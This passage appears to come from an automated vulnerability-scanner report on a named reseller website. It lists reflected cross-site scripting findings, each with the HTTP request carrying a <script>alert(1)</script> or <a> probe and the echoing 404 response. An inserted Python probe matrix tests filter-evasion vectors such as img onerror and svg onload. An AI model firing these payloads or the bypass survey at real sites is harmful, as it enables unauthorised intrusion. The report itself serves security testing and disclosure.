The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 535c7<a>8503759ab91 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/search.php?keyword=search...535c7<a>8503759ab91&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/search.php?keyword=search...535c7<a>8503759ab91&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3097. http://www.resellerbase.com/detail/44/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 79245<script>alert(1)</script>fec79c6ebe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/search.php?keyword=search...&Submit3=Search&opt=2&79245<script>alert(1)</script>fec79c6ebe4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/search.php?keyword=search...&Submit3=Search&opt=2&79245<script>alert(1)</script>fec79c6ebe4=1 was not found on this server.</p>
...[SNIP]...

2.3098. http://www.resellerbase.com/detail/44/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c781d<a>831852012b1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/search.php?keyword=search...&Submit3=Search&opt=2c781d<a>831852012b1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/search.php?keyword=search...&Submit3=Search&opt=2c781d<a>831852012b1 was not found on this server.</p>
...[SNIP]...
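
Findings 2.3095, 2.3096 and 2.3098 were rated Firm because a bare <a> probe came back verbatim in the keyword, Submit3 and opt values while the <script> proof-of-concept did not, and the report leaves the reason to manual examination. The following is an added example, not from the report or from the site, of that manual step: a probe matrix run against a stand-in filter. The filter is hypothetical (a token blacklist is the commonest cause of exactly this tag-survives-but-script-does-not pattern); nothing in the scan shows what the real obstacle is, and the same survey would be run with live requests to find out.

```python
import html
import re

# Hypothetical stand-in for the unidentified obstacle: strips <script ...>,
# </script> and javascript: from parameter values, case-insensitively.
_BLACKLIST = re.compile(r'<\s*/?\s*script[^>]*>|javascript\s*:', re.IGNORECASE)


def hypothetical_value_filter(value: str) -> str:
    return _BLACKLIST.sub('', value)


def render_with_unknown_filter(value: str) -> str:
    """404 body as seen in the report, with the stand-in filter applied to the
    Submit3 value only (path segments and parameter names reflect raw)."""
    return ('<p>The requested URL /detail/44/search.php?keyword=search...&Submit3='
            + hypothetical_value_filter(value)
            + '&opt=2 was not found on this server.</p>')


def render_encoded(value: str) -> str:
    """What the same page returns once the URL is HTML-encoded on output."""
    return ('<p>The requested URL /detail/44/search.php?keyword=search...&Submit3='
            + html.escape(value, quote=True)
            + '&opt=2 was not found on this server.</p>')


# One probe per hypothesis about the obstacle. Each is wrapped in a unique
# marker so a verbatim echo can be located unambiguously in the response.
PROBES = {
    'angle_brackets': '<>',
    'bare_tag': '<a>',                          # the probe the report rated Firm
    'script_tag': '<script>alert(1)</script>',
    'script_mixed_case': '<ScRiPt>alert(1)</ScRiPt>',
    'img_onerror': '<img src=x onerror=alert(1)>',
    'svg_onload': '<svg onload=alert(1)>',
    'js_uri': 'javascript:alert(1)',            # only matters in an href/src context
}

# Probes that execute script when reflected verbatim between tags.
EXECUTES = {'script_tag', 'script_mixed_case', 'img_onerror', 'svg_onload'}


def survey(render_fn, prefix: str = 'zq7', suffix: str = '7qz') -> dict:
    """Return {probe_name: True if the marked probe is echoed byte-for-byte}."""
    return {name: (prefix + token + suffix) in render_fn(prefix + token + suffix)
            for name, token in PROBES.items()}


def pick_vector(results: dict):
    """First probe that both survived the obstacle and executes script, or None."""
    for name in PROBES:
        if results[name] and name in EXECUTES:
            return name
    return None


if __name__ == '__main__':
    for label, fn in (('stand-in filter', render_with_unknown_filter),
                      ('output-encoded', render_encoded)):
        r = survey(fn)
        print(label, {k: v for k, v in r.items()}, '->', pick_vector(r))
```

Against the stand-in, the survey shows the obstacle is a script-token blacklist and an event-handler vector still executes, which is what would move such a finding from Firm to Certain; against the output-encoded page no executing probe survives (the javascript: probe is echoed, which is harmless in text between tags and only relevant if the value were also written into an attribute).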

2.3099. http://www.resellerbase.com/detail/44/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 755fb<script>alert(1)</script>36793ad95ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail755fb<script>alert(1)</script>36793ad95ea/44/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail755fb<script>alert(1)</script>36793ad95ea/44/themes/ was not found on this server.</p>
...[SNIP]...

2.3100. http://www.resellerbase.com/detail/44/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d9f08<script>alert(1)</script>10fa56f23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44d9f08<script>alert(1)</script>10fa56f23/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44d9f08<script>alert(1)</script>10fa56f23/themes/ was not found on this server.</p>
...[SNIP]...

2.3101. http://www.resellerbase.com/detail/44/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4a1af<script>alert(1)</script>60eac0a129e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes4a1af<script>alert(1)</script>60eac0a129e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes4a1af<script>alert(1)</script>60eac0a129e/ was not found on this server.</p>
...[SNIP]...

2.3102. http://www.resellerbase.com/detail/44/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9062c<script>alert(1)</script>d0dc6c6000c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/?9062c<script>alert(1)</script>d0dc6c6000c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/?9062c<script>alert(1)</script>d0dc6c6000c=1 was not found on this server.</p>
...[SNIP]...

2.3103. http://www.resellerbase.com/detail/44/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 82cfb<script>alert(1)</script>5f6ae23dbd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail82cfb<script>alert(1)</script>5f6ae23dbd1/44/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail82cfb<script>alert(1)</script>5f6ae23dbd1/44/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3104. http://www.resellerbase.com/detail/44/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8dde0<script>alert(1)</script>7b915b7e4b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/448dde0<script>alert(1)</script>7b915b7e4b7/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/448dde0<script>alert(1)</script>7b915b7e4b7/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3105. http://www.resellerbase.com/detail/44/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bcd8a<script>alert(1)</script>353fe54d8c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themesbcd8a<script>alert(1)</script>353fe54d8c4/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themesbcd8a<script>alert(1)</script>353fe54d8c4/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3106. http://www.resellerbase.com/detail/44/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f1220<script>alert(1)</script>a84f1d4fbb5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmosf1220<script>alert(1)</script>a84f1d4fbb5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmosf1220<script>alert(1)</script>a84f1d4fbb5/ was not found on this server.</p>
...[SNIP]...

2.3107. http://www.resellerbase.com/detail/44/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 55c55<script>alert(1)</script>32df31581d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/?55c55<script>alert(1)</script>32df31581d8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/?55c55<script>alert(1)</script>32df31581d8=1 was not found on this server.</p>
...[SNIP]...

2.3108. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0926<script>alert(1)</script>caafe5879c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild0926<script>alert(1)</script>caafe5879c/44/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild0926<script>alert(1)</script>caafe5879c/44/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3109. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee9a3<script>alert(1)</script>4229fe8d429 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44ee9a3<script>alert(1)</script>4229fe8d429/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44ee9a3<script>alert(1)</script>4229fe8d429/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3110. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1134<script>alert(1)</script>b995f995571 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themesb1134<script>alert(1)</script>b995f995571/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themesb1134<script>alert(1)</script>b995f995571/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3111. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4bd55<script>alert(1)</script>c8caf12d1a3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos4bd55<script>alert(1)</script>c8caf12d1a3/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos4bd55<script>alert(1)</script>c8caf12d1a3/images/ was not found on this server.</p>
...[SNIP]...

2.3112. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 96a0b<script>alert(1)</script>cb8062de9f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images96a0b<script>alert(1)</script>cb8062de9f9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images96a0b<script>alert(1)</script>cb8062de9f9/ was not found on this server.</p>
...[SNIP]...

2.3113. http://www.resellerbase.com/detail/44/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 57d11<script>alert(1)</script>351f5b5b698 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/?57d11<script>alert(1)</script>351f5b5b698=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/?57d11<script>alert(1)</script>351f5b5b698=1 was not found on this server.</p>
...[SNIP]...

2.3114. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/

Issue detail

